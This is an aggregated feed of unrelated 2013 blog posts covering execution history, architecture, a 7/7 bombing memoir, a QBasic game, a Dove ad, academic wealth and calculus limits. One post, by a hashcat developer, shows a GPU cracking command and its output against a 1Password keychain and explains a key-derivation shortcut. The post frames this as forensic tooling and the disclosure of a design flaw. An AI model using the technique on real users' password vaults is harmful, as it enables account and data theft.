In focusing on the theatrical aspects of Marketman’s execution, we don’t mean to suggest that the sea-chirurgeon’s encounter with his death was in any way insincere: present-day executions too comprise a ritualized performance in which a good many dying prisoners are very willing to participate. (Modern American executions behind prison walls don’t map to the take-warning-from-my-fate discourse, but it’s quite common for those on the gurney to offer victims’ witnesses the “closure” shibboleth.)

The early-modern condemned were widely expected to give a pedagogical account of themselves before execution, and widely complied with the expectation. Marketman simply underscores the surprising extent to which a fellow will not only comply but actively assert his part in his own death. Marketman wanted his hanging to embody redemption, instruction, and the majesty of the law that hanged him. Maybe in his heart of hearts he even wanted that before he knifed poor Mary Snerlin.

The chirurgeon went so far as to write a prison letter to his supposed rival: “As for the injury you have done me, I freely from my heart forgive you, begging God to give you grace that you may unfeignedly repent of all your sins, that God may have mercy on your soul.”

See J.A. Sharpe, “Last Dying Speeches: Religion, Ideology and Public Execution in Seventeenth-Century England,” Past & Present, May 1985.

* Say what you will about chirurgeons, they know about killing.

** This source also says his wife was pregnant, which must have added some vinegar to Marketman’s cuckoldry suspicions.

16 Apr 03:00

Oficinas Nirvana Film / SJK Architects

by José Tomás Franco

© Pallon Daruwalla & Shimul Javeri Kadri

Arquitectos: SJK Architects
Ubicación: Bangalore, India
Equipo De Diseño: Shimul Javeri Kadri, Sarika Shetty, Roshni Kshirsagar, Poonam Sachdev
Área: 8000 m2
Año: 2011
Fotografías: Pallon Daruwalla & Shimul Javeri Kadri

Nirvana es un espacio de oficinas para una empresa de producción cinematográfica. Sus películas son una sorpresa, con una perspectiva humana inexplorada. Su área de trabajo se basa en la idea de que la conexión de las sinapsis crea las ideas – no la privacidad o el aislamiento.

© Pallon Daruwalla & Shimul Javeri Kadri

La “caja” de Nirvana surgió, como en todos los edificios urbanos, de una pequeña parcela de esquina en el corazón del concurrido barrio de Indiranagar en Bangalore. El edificio fue construido con un presupuesto de 2.25 millones de rupias (incluidos todos los servicios e interiores).

© Pallon Daruwalla & Shimul Javeri Kadri

Este proyecto explora las posibilidades inherentes a un edificio comercial a pesar de las limitaciones de las propiedades inmobiliarias. La tipología urbana resultante anula todas las normas -casi sin usar electricidad- para la luz o la ventilación. El núcleo de este cuadro es la escalera central, que corta el edificio en base a un gran tragaluz, bañando con luz y ventilación natural el interior.

© Pallon Daruwalla & Shimul Javeri Kadri

Las divisiones entre las áreas de trabajo y descanso se borran por la presencia del núcleo de la escalera. La fachada facilita aún más las conexiones hacia el exterior a través del vidrio y las rejillas de acrílico. Así, las persianas, opacas y sólidas, abiertas al unísono permiten el paso de la brisa, la luz, el viento y la lluvia. La noción de pared y ventana se intercambia, lo que genera una fachada dinámica. La ventana es sólida, el muro transparente y abierto. Estas persianas, construidas de hojas de acrílico sólido, se personalizaron y se utilizan como un elemento exterior por primera vez en la India.

© Pallon Daruwalla & Shimul Javeri Kadri

El núcleo de la escalera es un dispositivo flexible, permeable, que permite el ingreso de la luz y la ventilación, y sin embargo, bloquea la lluvia y entrega privacidad. Este elemento de madera y acrílico transparente es en realidad un conjunto persianas entrelazadas entre sí, capaces de moverse al unísono, una vez más, para ventilar el espacio. Los baños de color negro sólido, el único espacio que exige una total privacidad, se crearon para contrastar completamente con la luminosidad del resto del edificio.

Planta

La ligereza de la estructura y sus materiales, madera, hormigón y vidrio produce un edificio donde la luz y la sombra, el pensamiento y la interacción se convierten en los protagonistas. Un edificio contemporáneo que hace caso omiso de cualquier “ismo” y es sinónimo de innovación, sostenibilidad y pluralismo (todos los rasgos estilísticos co-existen; sillas clásicas, gráficos kitsch, ventanas antiguas). El éxito del proyecto se pone de manifiesto con los comentarios del equipo de producción: “trabajamos más horas y con muchas ganas. Nos encanta la luz y está por todas partes”.

Corte

Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects © Pallon Daruwalla & Shimul Javeri Kadri Nirvana Film Office / SJK Architects Planta Nirvana Film Office / SJK Architects Emplazamiento Nirvana Film Office / SJK Architects Corte

Oficinas Nirvana Film / SJK Architects originalmente publicado en Plataforma Arquitectura el 16 Abr 2013.

Enviar a Twitter | Compartir en Facebook | ¿Qué opinas del articulo?

16 Apr 07:00

Cabane 217 / Bourgeois Lechasseur Architectes

by Fernanda Castro

© Stéphane Groleau

Arquitectos: Bourgeois Lechasseur Architectes
Ubicación: Ste-Catherine-de-la-Jacques-Cartier, Quebec, Canada
Contratista: Constructions Richard Cliche
Año: 2012
Fotografías: Stéphane Groleau

© Stéphane Groleau

Cabane 217 es un proyecto para rediseñar completamente una vivienda situada en Ste-Catherine-de-la-Jacques-Cartier. La casa está situada en un terreno arbolado bordeando el río. El propietario quería dar una nueva vida a su hogar al abrirlo al entorno. Los cambios también implicaron repensar completamente las zonas de vida con el fin de crear un diálogo entre el exterior y el interior. La premisa básica consistía en conservar algo del carácter original del edificio y la creación de un proyecto contemporáneo que está en armonía con su entorno. El diseño siguió un modelo preliminar de LEGO ™ creado por el propietario.

© Stéphane Groleau

La fuerte pendiente de la cubierta se mantiene, pero los tragaluces tradicionales se han transformado. Una buhardilla se abre a la calle para mostrar tímidamente la escalera y para proporcionar luz al espacio central de la casa. En el lado más cercano al río, parte del techo se ha planteado para dar cabida a la habitación principal y un baño privado. La segunda buhardilla, de mayor tamaño, crea un espacio aireado y luminoso. El cliente puede mantener así la idea de una “casa en el árbol” y todavía preservar la privacidad con la vegetación circundante.

© Stéphane Groleau

La sala de proyección que sobresale de la parte principal del edificio es una adición a la casa original. Esta habitación tiene una chimenea que hace del lugar un espacio íntimo y acogedor. Esto contrasta con las amplias habitaciones y la gran cubierta que lleva al cliente a una nueva relación con su entorno. Se proporciona un umbral entre el interior y el exterior que enmarca las vistas del sitio.

© Stéphane Groleau

El interior es ahora mucho más brillante con la naturaleza a su alrededor. La cocina ha sido completamente renovada. Los paneles de madera y el suelo de pizarra respetan la sensación cálida y natural del lugar. Una escalera nueva, más ligera y más brillante conduce a la piso superior. El cuarto de baño con su ducha espectacular, se abre en el dormitorio principal. Las ventanas de piso a techo en el dormitorio dan la impresión de estar flotando en los árboles.

© Stéphane Groleau

Los materiales utilizados en el exterior se integran bien en el entorno natural y construido de la región. El revestimiento de madera original fue conservado y repintado. Las ventanas son de madera como las originales y parecen fluir en los paneles contrachapados que se extienden definiendo nuevos elementos. El techo de metal refleja el sol y hace pensar en el diseño tradicional de esta casa de campo.

Corte

Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes Vivienda Original Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes Vivienda Original Cabane 217 / Bourgeois Lechasseur Architectes © Stéphane Groleau Cabane 217 / Bourgeois Lechasseur Architectes Emplazamiento Cabane 217 / Bourgeois Lechasseur Architectes Corte Cabane 217 / Bourgeois Lechasseur Architectes Elevación Cabane 217 / Bourgeois Lechasseur Architectes Elevación

Cabane 217 / Bourgeois Lechasseur Architectes originalmente publicado en Plataforma Arquitectura el 16 Abr 2013.

Enviar a Twitter | Compartir en Facebook | ¿Qué opinas del articulo?

17 Apr 02:20

The bomb that changed my life (2011)

On July 7th, 2005, near Edgware Road in London, shortly before 9am, I sat on a train, listening to my music on an iAudio M3L (I was very late to the iPod party), on my way to my Accenture job. It was summer, but the weather was not particularly sunny. Typical London grey. I don't remember what I was thinking about, but it was probably something trivial.

Suddenly, there was, first, a flash. The light came before the sound. My vision went black, and simultaneously a bright light started at the centre of my vision and expanded outwards. It looked like those cartoon drawings of explosions, but bright and, soon, loud. Not a weighty, ponderous sound, more like the bass-less sound of a firearm (in real life, not in the movies). Like a very loud TACK.

Thick black smoke poured through the open windows at either end of the tube carriage I was in and quickly filled it. I sat frozen, incapable of moving, not even to pull the headphones out of my ears. Only one thought looped through my head, over and over and over again, endlessly:

This was a bomb. This was obviously a bomb. There could be another bomb. If the other bomb was in this carriage, I would be dead before I knew it.

Before that day, I never understood the expression "paralysed by fear". It was something I'd read and dismissed as an image. On July 7th, 2005, I experienced it directly. For what felt like an eternity (but I think was about 2 minutes) the only thing my brain could do was repeat that same stream of thought over and over again endlessly. There seemed to be nothing else to do or think in the universe. I was maybe about to die and that was all that mattered. I didn't even look around the carriage to see how other people were reacting. I was in my own little world, frozen, paralysed.

How did I get out of it? Somehow, I noticed some movement to my side. People were trying to pry open the doors of the train, to let some of the smoke out, to let some air in. I felt an impulse to help. A new thought appeared: I am a mentally balanced, healthy young man. I should be one of those people who can help others in this situation, not just a passive, helpless observer. I can help: I have a backpack which I can stick into the doors to keep them partly open.

The paralysis drained away. I stood up, went to the door, and as the others held them open, shoved my backpack in the opening. They released their grip and the doors stayed partially open, letting the ugly smoke out and the marginally better air from the tube tunnels in.

Now that I was standing, I pulled my headphones out. But the music continued playing in my head. It was a hypnotic, great track by James Holden. You can listen to it here, while you read the rest of this article. For the forty-five minutes that we were all stuck in this carriage with our fears, the music never stopped. I like to think that some part of my brain knew that I needed the soothing that the music provided.

I remember some parts from those 45 minutes. Mostly, I remember having to rise above the fear of there being another bomb. I remember looking around and seeing that this fear was in every face, in every word that every person said, and at the same time, it was anathema, unspeakable, and for forty-five minutes not a single of the 40 people in that carriage put that fear into words.

I remember a young woman who stood next to me and tried to make conversation, probably to reassure herself that all was normal. I remember that I could not give her that reassurance. I was fighting my own demon, and I had no energy to spare on small talk, which takes effort from me even in normal social situations. I could tell she needed it, but I could not give it. Eventually she found someone else to try to talk to.

I don't remember what was discussed by people in the train, but I remember there was a concerted, deliberate effort to not think of what this obviously was. Everyone knew it was obviously a bomb. But the awful consequence that rode on that thought, the possibility of there being another bomb right here, right now, was unthinkable, and so the obvious truth was banished. I even convinced myself, for a while, that it could be something else.

It was hard work, this self-delusion, when the minutes were punctuated by the nearby screams of the wounded and dying. Six people died there at Edgware Road, metres away. Fifty-six, including the four bombers, across the tube network. Several dozens more lived with serious injuries, their life probably changed forever. But for forty-five minutes, forty uninjured commuters managed the feat of convincing themselves that this was anything but a bomb. I think the favourite theory was an electrical explosion, until the driver walked through the carriage.

He came to perform the impossible task of reassuring us and to let us know what was next. The reassurance was honest, if not very effective. Asked if it could be an electrical explosion, he answered, "I don't know what this was, and I don't want to make up any theories, but I know in 18 years of working here I've never seen anything like this." He stopped short of declaring the obvious.

However, by then, the self-delusion was in full effect. To give you an idea of how much we all needed to believe that this was not what it plainly was, one old lady, wrapped up in the reality distortion field, asked the driver if it would be possible to ask people in the neighbouring carriages to stop screaming, as it was very unnerving.

"Madam, some of these people are dying," was the driver's response, ending that conversation.

It's easy to think that woman was insensitive. She merely expressed, in an absurd way, the belief to which we were all clinging to. She probably regrets asking that awful question, to this day. But she shouldn't. She was a symptom of a group behaviour, not a cause of it.

Eventually, we were allowed out of the train. Our train was not actually damaged (other than the front), the bomb had been on the oncoming train. As the driver later put it in this BBC interview, we were incredibly lucky. Had the bomb exploded ten seconds later, it would have taken out one of our carriages too - maybe the one I was sitting on. I owe my life to a terrorist's inept planning.

Our train had stopped going forward in part because the roof of the other train was on our tracks, ripped out by the blast. Both had continued moving forwards, coming to rest alongside each other. So at one point, still inside our train, we had to pass, to our right, the carriage where the blast had happened. The driver advised us not to look to the right.

In most other situations, I might have disobeyed. I am naturally curious. I need to observe. I want to. This time, I did what I was told. Somewhere inside, I knew that I would have enough emotional baggage to deal with without throwing in pictures of dying people and mutilated, burnt bodies. We got out of the carriage, walked along the tracks, and came out of the station. There was no one waiting to shuffle us towards ambulances, care workers, or anything, and that's ok - we weren't injured at all, at least physically. They should probably have taken names, to offer psychological counselling later, but they had other things to worry about.

The only signs of the death happening below were two people, wrapped in the thick bandages which are used on gravely burnt people. They were covered from head to toe. Did they live or not? I don't know. They were sitting alone, abandoned, motionless, leaning against a wall. Chaos reigned outside, police, ambulances, people, crowds, cars, buses, all jumbled up.

I managed to call my parents just before the phone network broke down. "There's been some kind of bombing in London. I'm ok. I'm getting away from the crowds."

And I did. As my mind started working again (or so I thought), my one thought, resuming from below-ground, was to stay away from crowds. There might be another bomb. I walked west, and ended up near some office buildings. There were bench-like wooden structures there. I sat down on one and I cried for ten whole minutes.

I needed to let the emotions out. I was too full, bursting.

Eventually, I ran out of tears. Insanely enough, I decided to make my way to work, on the other side of town, while avoiding public transports. I walked all the way to the centre of Hyde Park. There, I sat on a bench and cried some more. Someone walked past me and, excited and scared, said "there's been a bombing!" "Yeah, I know..." I said weakly as he walked away.

I continued my wandering, aiming roughly in the right direction. I felt clear-headed, but in hindsight my brain was clearly not quite right yet. I was sleep-walking, moving in automatic mode. The obvious thing to do was to go home, but the default was to go to work. I was finally jolted awake when a huge truck stopped next to me. I flinched away - imagine if there was a bomb in that! - and then noticed some soldiers with big machine guns pulling up concrete fence-slabs into the road. I heard an elderly gentleman ask one of the soldiers what was going on, and the soldier replied that this was the US embassy.

The US embassy!

Somehow, wandering randomly through London in a general west-to-east direction, trying to avoid dangerous crowds, I had managed to find myself in probably the most risky place to be a few hours after the bombings. That woke me up. I made my way home.

On the way, I remember seeing a bus crammed with people. It stopped next to me, and I took some steps away from it. Insane, I thought. After what just happened? But for most people, this was just an annoying travel disruption, I guess.

I got home. A friend came to visit to make sure I was alright (thanks Andy!). I was. This was a Thursday, and Friday was declared a day off. I stayed out of public transports for the weekend. On Monday, I had to get to work, but, although I felt no sense of panic, I decided to travel at 6am to make it less likely that I would connect tube travel with fear. The tube was mostly empty at that time. This would not be a popular hour for a bombing.

Over time, I got used to the tube again. Now, I feel no fear - almost. Every once in a while, very rarely (once or twice a year), I will spot someone who looks suspicious, with a bag that could contain a bomb, in my carriage. Sometimes, that is followed by a wave of fear. I can control it. It doesn't show on my face or in the tone of my voice. But at the next stop, I get off and wait for the next train. Just in case.

Throughout that summer, my second year in Accenture I had been mildly discontented. I felt that my job was a little boring, but I kind of accepted that. It was a new project - my second project - so it wasn't so bad. And yet, it was during that summer that I started looking for a new job. There was something about the idea that I might have died in a grey train full of grey commuters, having not truly lived, that I could not stand.

Over the next year, I looked for jobs in banks and other consultancies, but they all seemed even worse than the job I had. I started writing fiction again. I read self-improvement books like "Seven Habits" and prepared a "mission statement" for myself, to figure out what it was that I wanted. Eventually, in my third year there, I started to think of starting my own business. Yes, that seemed more interesting.

Then, one of my best friends got in touch with me with this idea to build this business that would make money. The rest of the story can be found scattered around the internet, on this blog and others. Today, in December 2011, six and a half years later, if I were to die in a train carriage tomorrow - well, I would still feel unfulfilled (there's a lot I still want to achieve, of course) but a hell of a lot less so than if the bomb had exploded 10 or 20 seconds later, that morning on July 7th, 2005.

Did this event change my life?

If you read this far, you should follow my RSS feed here.


17 Apr 02:20

1Password GPU brute-force with 3M hash/s

In the last weeks I spend a lot time adding TrueCrypt to oclHashcat-plus since there have been lots of requests for it and I can see how forensic world will benefit from it.

This week I finally finished the first milestone, the hashing part of TrueCrypt. That is PBKDF2-HMAC-Whirlpool, -RipeMD160 and -SHA512. Unfortunately there is another milestone. To finally crack TrueCrypt, you have to decrypt a 448 byte block of data using AES, Serpent or Twofish or some obscure combinations of them. The important word is AES here. To finish support for efficiently cracking TrueCrypt there is no way around adding AES to GPU. Problem is, I never used AES before and it was totally a new world for me.

How to start digging into AES? I thought the best way is to combine the learning phase with something that uses AES and so add some nice new algorithm. At this time, some guy posted a request on hashcat forum asking for support to crack 1Password Agilebits keychain. Guess what, it uses AES Smile

I did not pay much attention to Agilebits 1Password before. I was happy with keepass and never thought about changing. I quickly downloaded the tool and was impressed how easy it worked. It installed without problems, has nice icons, seemed to be very intuitive and it there is also a browser integration so I thought I should finally move from keepass to 1Password.

However, thats the story so far why I started to add 1Password to oclHashcat-plus. So I started to dig into AES and experimented a bit with it and the 1Password keychain. I finally got it working and then ported it to GPU. So what you see here is worlds first 100% GPU implementation of 1Password keychain.

There are other solutions out but they are using CPU to do the AES part.

Quote:
root@sf:~/oclHashcat# ./oclHashcat-plus64.bin -m 6600 testhash2 -a 3 ?l?l?l?l?l?l?l! -u 1000 -n 128
oclHashcat-plus v0.15 by atom starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Workload: 1000 loops, 128 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Cayman, 1024MB, 830Mhz, 24MCU
Device #2: Cayman, 1024MB, 830Mhz, 24MCU
Device #3: Cayman, 1024MB, 830Mhz, 24MCU
Device #4: Cayman, 1024MB, 830Mhz, 24MCU
Device #1: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #2: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #3: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)
Device #4: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (974136 bytes)

testhash2:hashcat!

Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l?l?l!)
Hash.Target....: File (testhash2)
Hash.Type......: 1Password Agile Keychain
Time.Started...: Tue Apr 16 15:30:55 2013 (7 mins, 3 secs)
Speed.GPU.#1...: 744.0k/s
Speed.GPU.#2...: 744.0k/s
Speed.GPU.#3...: 743.9k/s
Speed.GPU.#4...: 743.5k/s
Speed.GPU.#*...: 2975.5k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1257111552/8031810176 (15.65%)
Rejected.......: 0/1257111552 (0.00%)
HWMon.GPU.#1...: 99% Util, 59c Temp, 29% Fan
HWMon.GPU.#2...: 99% Util, 64c Temp, N/A Fan
HWMon.GPU.#3...: 99% Util, 58c Temp, 29% Fan
HWMon.GPU.#4...: 99% Util, 55c Temp, N/A Fan

Started: Tue Apr 16 15:30:55 2013
Stopped: Tue Apr 16 15:38:00 2013

As you can see, oclHashcat-plus is running with nearly 3Mhash/s using my two hd6990's which is ~ the speed of two hd7970 (a bit faster).

The reason for the high speed is what I think this might be a design flaw. Here is why:

1Password uses PBKDF2-HMAC-SHA1 to derive a 256 bit key. Actually we are generating a 320 bit key using PBKDF2-HMAC-SHA1 this way but its then truncated to 256 bit. No problem so far, many algorithms like WPA are doing the same thing.

The PBKDF2-HMAC-SHA1 part is what makes the entire calculation slow. For each iteration of PBKDF2-HMAC-SHA1 you call 4 times the SHA1 transform. But this is only to produce a 160 bit key. To produce the required 320 bit key, you call it 8 times. So if you have 1000 iterations, you call it 8000 times. Due to some simple optimizations you can do with HMAC you can precompute ipad and opad, so you end up in 2 + (2 * iterations) = 2002 for 160 bit or 4004 calls to SHA1 transform for 320 bit.

1Password then uses AES in CBC mode to decrypt 1040 byte of data. To be exact, it takes the first 128 bit of the derived key to setup the AES key and takes another 128 bit as an IV for the CBC.

The goal is match the final padding block decrypted 1040 byte of data. If you find the last four 32-bit integers at 0x10101010 the padding is correct and you know your key was correct.

In CBC mode, you take the IV only for the first decryption. You then replace it with the ciphertext of current block (which is then used for the next block).

But if you take a close look now you see these both mechanisms do not match in combination. To find out if the masterkey is correct, all we need is to match the padding, so all we need to satisfy the CBC is the previous 16 byte of data of the 1040 byte block. This 16 byte data is provided in the keychain! In other words, there is no need to calculate the IV at all. Instead of calculating a 256 bit key in the PBKDF2, we just need to calculate 128 bit. Since SHA1 gives us 160 bit, we can save exactly twice the number of calls to sha1 transform. This way I was able the reduce the calls to SHA1 transform from 8000 to 2002 Smile

Stay tuned for oclHashcat-plus v0.15!

17 Apr 02:20

The best QBasic game ever?

What's the most difficult thing you did in the last year?  Now stop. Before you answer, can it compare to creating a full-fledged indie game—slated to be approved on Steam—created entirely with QBASIC? Probably not.

QBASIC is a software interpreter for the BASIC programming language that showed up in 1991, and basic it is. Here's a little video of a game created by IBM to show off the awesome power of QBASIC when it first launched:

You get the idea after about 45 seconds. Now, over 20 years later—but with the exact same programming tools—we have Black Annex. Check out this trailer with actual gameplay—and I can't say it enough—using the same programming language that the above video was "showing off."

Not only are the simple visuals awesome, but the gameplay actually looks complex and tough to master—not something you'd expect from a programming language with simple loops and statements.

It's an isometric corporate sabotage and infiltration game. What that means exactly I'm not sure but you can choose your own playstyle and outfit agents to "steal, destroy, kidnap and kill" as you wish.

I didn't want to 'learn' how to make a game—I realized I already knew how to make a game. I just had to go back to the tools I knew.

But why QBASIC when there are so many other powerful tools out there that would probably be simpler to use? Lance McDonald, the game's creator, hearkened back to when he made games as a kid with QBASIC and wanted to make a love letter to the great games of the '90s.

"When I sat down to make Black Annex a year ago, I didn't want to 'learn' how to make a game—I realized I already knew how to make a game. I just had to go back to the tools I knew" McDonald said. He also mentioned that he mailed a QBASIC game to Epic MegaGames when he was 9 and never heard back. He had something to prove.

Black Annex's Steam Greenlight page.

Black Annex was just announced last week and has already gained a lot of steam (pun intended) on Steam's Greenlight program, where users can vote on smaller games they'd like to see made available for purchase on the Steam platform.

"It would be amazing for the game development community," said McDonald when asked about Black Annex's potential ascension to Steam. "It would show that even old, abandoned tools and the most basic pieces of software can still be put in the hands of someone who wants to create their dream and result in beautiful things happening."

A couple more fun facts about the game:

  • Black Annex requires at least a 2.6GHz processor due to the scope of the project and the unoptimized multi-dimensional arrays.
  • The game's catchy tune is by Abducted by Sharks
  • It will support mods (meaning customized missions, levels, etc.)
  • The game is a 12000 line .bas (BASIC) file. Yeesh!
17 Apr 07:16

Criminal Sketch Artist Draws Women as They See Themselves and as Others See Them

Gil Zamora is an FBI-trained forensics artist with over 3,000 criminal sketches under his belt. Dove and Ogilvy Brazil hired him to interview and draw seven different women—two sketches of each. The first sketch was based on each woman's personal description of herself. The second was based on a description provided by a stranger the woman had just met. Of course, the differences are vast. Watching these women come face to face with the version of themselves in their mind and the version everyone else sees is extraordinary. It's one of the most original and touching experiments to come from the Campaign for Real Beauty in ages, because instead of making faux protests or annoying graphic designers with bullshit filters, they're actually empowering individual women to appreciate their inherent beauty, and in turn, allowing us all to wonder if we've been judging ourselves too harshly. Like all of the best work, the commercial elements are barely there. Beyond the logo, Dove doesn't even attempt to sell soap. Watch the documentary below, and mini-videos of selected women on the web site. Then enjoy the rousing comments section, where people are already attacking Dove for choosing too many skinny, white chicks.

CREDITS
Client: Dove
Agency: Ogilvy & Mather Brazil
Chief Creative Officer: Anselmo Ramos
Executive Creative Director: Roberto Fernandez /Paco Conde
AD: Diego Machado
CW: Hugo Veiga
Sketch Artist: Gil Zamora
Producer: Veronica Beach
Junior Producer: Renata Neumann
Business Manager: Libby Fine
CEO: Luis Fernando Musa
Group Account Director: Valeria Barone
Account Director: Ricardo Honegger

Production Company: Paranoid US
Director: John X Carey
Executive Producer: Jamie Miller / Claude Letessier
Line Producer: Stan Sawicki
Director of Photography: Ed David

—Long Version
Executive Producer: Jamie Miller / Claude Letessier
Producer: Stan Sawicki
Editor: Phillip Owens
Music: Subtractive
Sound mix: Lime Studio
Composer: Keith Kenniff
Mixer: Sam Casas
Executive Producer: Jessica Locke
Production Sound: Tim O’Malley
Color Grading: Company 3
Colorist: Sean Coleman

—Short Version and Cinema
Editorial Company: Rock Paper Scissor
Executive Producer: Carol Lynn Weaver
Editor: Paul Kumpata
Assistant Editor: Niles Howard
Online: A52
Executive Producer: Megan Meloth
Producer: Jamie McBriety
Music: Subtractive
Composer: Keith Kenniff
Sound mix: Lime Studio
Mixer: Sam Casas
Executive Producer: Jessica Locke
Production Sound: Tim O’Malley
Color Grading: Company 3
Colorist: Sean Coleman

16 Apr 05:00

The Millionaire Next Door. . . An Academic Entrepreneur

Two recently published articles caught my attention.  And, bear with me, they are related!  In the first one, Bob Dudley, the well respected CEO of BP, is quoted: 

Employment is difficult in many places.  But anybody who goes through petroleum engineering, chemical engineering there will be jobs for them. . . .  . . . they will have phenomenal opportunities.

In past blogs, as well as in Stop Acting Rich, I have mentioned that engineers in general are quite productive in transforming income into wealth.  Even more productive are professors who teach petroleum engineering, chemical engineering, mining engineering, etc.

The second article deals with the concept of substituting computer software for humans in grading essay exams.  After reading this, I had a hollow feeling in my gut because my choice of becoming a professor was initially stimulated by my experiences grading essay exams.  During my first year in a master's program a senior faculty asked me:  "Do you want to make some extra money?  I need you to grade some midterm exams." I accepted the offer, and I was delighted with my new task.  Part of the job description was to read the textbook thoroughly in order to evaluate the essays.  Essentially I was paid to improve my knowledge and understanding of the subject matter in my chosen field.  It is the same way with teaching.  Later, as a professor, I was compensated for constantly learning and disseminating knowledge via lectures, published papers and books. 

Some in education complain about "the agony and hard work associated with publishing."  But publishing is a way to prove to yourself and others that you are a scholar.  Publishing enhances your reputation as an expert and leading authority.  By doing so you, your university and your students all benefit from such achievements.

A good number of professors can be classified as academic entrepreneurs.  As an example, consider Dr. David Schwartz, one of my early mentors.  His book, The Magic of Thinking Big, sold over 3 million copies, the audio version over 11 million.  He also wrote two successful textbooks.  Dave received more  than 200 offers per year to give speeches and training seminars independent of the university.  Yet he never made a sales call; he never had to. 

In Selling to the Affluent, I mentioned that

There is a significant number of David types in our academic communities.  In fact, according to the National Science Foundation, more than 3,000 engineering and science professors . . . own companies independent of their respective universities.

There are tremendous employment opportunities for those have a degree in petroleum and chemical engineering.  But I also think there is a greater opportunitity for those who teach these subjects.  It's not easy to spend 3 more years earning a Ph.D.  But those among them who become academic entrepreneurs can write their own ticket to success.  This assumes that professors will not be replaced with software driven robots!

15 Apr 17:11

An Intuitive Introduction To Limits

by kalid

Limits, the Foundations Of Calculus, seem so artificial and weasely: “Let x approach 0, but not get there, yet we’ll act like it’s there… ” Ugh. Here’s how I learned to enjoy them:

  • What is a limit? Our best prediction of a point we didn’t observe.
  • How do we make a prediction? Zoom into the neighboring points. If our prediction is always in-between neighboring points, no matter how much we zoom, that’s our estimate.
  • Why do we need limits? Math has “black hole” scenarios (dividing by zero, going to infinity), and limits give us a reasonable estimate.
  • How do we know we’re right? We don’t. Our prediction, the limit, isn’t required to match reality. But for most natural phenomena, it sure seems to.

Limits let us ask “What if?”. If we can directly observe a function at a value (like x=0, or x growing infinitely), we don’t need a prediction. The limit wonders, “If you can see everything except a single value, what do you think is there?”.

When our prediction is consistent and improves the closer we look, we feel confident in it. And if the function behaves smoothly, like most real-world functions do, the limit is where the missing point must be.

Key Analogy: Predicting A Soccer Ball

Pretend you’re watching a soccer game. Unfortunately, the connection is choppy:

soccer limits

Ack! We missed what happened at 4:00. Even so, what’s your prediction for the ball’s position?

Easy. Just grab the neighboring instants (3:59 and 4:01) and predict the ball to be somewhere in-between.

And… it works! Real-world objects don’t teleport; they move through intermediate positions along their path from A to B. Our prediction is “At 4:00, the ball was between its position at 3:59 and 4:01″. Not bad.

With a slow-motion camera, we might even say “At 4:00, the ball was between its positions at 3:59.999 and 4:00.001″.

Our prediction is feeling solid. Can we articulate why?

  • The predictions agree at increasing zoom levels. Imagine the 3:59-4:01 range was 9.9-10.1 meters, but after zooming into 3:59.999-4:00.001, the range widened to 9-12 meters. Uh oh! Zooming should narrow our estimate, not make it worse! Not every zoom level needs to be accurate (imagine seeing the game every 5 minutes), but to feel confident, there must be some threshold where subsequent zooms only strengthen our range estimate.

  • The before-and-after agree. Imagine at 3:59 the ball was at 10 meters, rolling right, and at 4:01 it was at 50 meters, rolling left. What happened? We had a sudden jump (a camera change?) and now we can’t pin down the ball’s position. Which one had the ball at 4:00? This ambiguity shatters our ability to make a confident prediction.

With these requirements in place, we might say “At 4:00, the ball was at 10 meters. This estimate is confirmed by our initial zoom (3:59-4:01, which estimates 9.9 to 10.1 meters) and the following one (3:59.999-4:00.001, which estimates 9.999 to 10.001 meters)”.

Limits are a strategy for making confident predictions.

Exploring The Intuition

Let’s not bring out the math definitions just yet. What things, in the real world, do we want an accurate prediction for but can’t easily measure?

What’s the circumference of a circle?

Finding pi “experimentally” is tough: bust out a string and a ruler?

We can’t measure a shape with seemingly infinite sides, but we can wonder “Is there a predicted value for pi that is always accurate as we keep increasing the sides?”

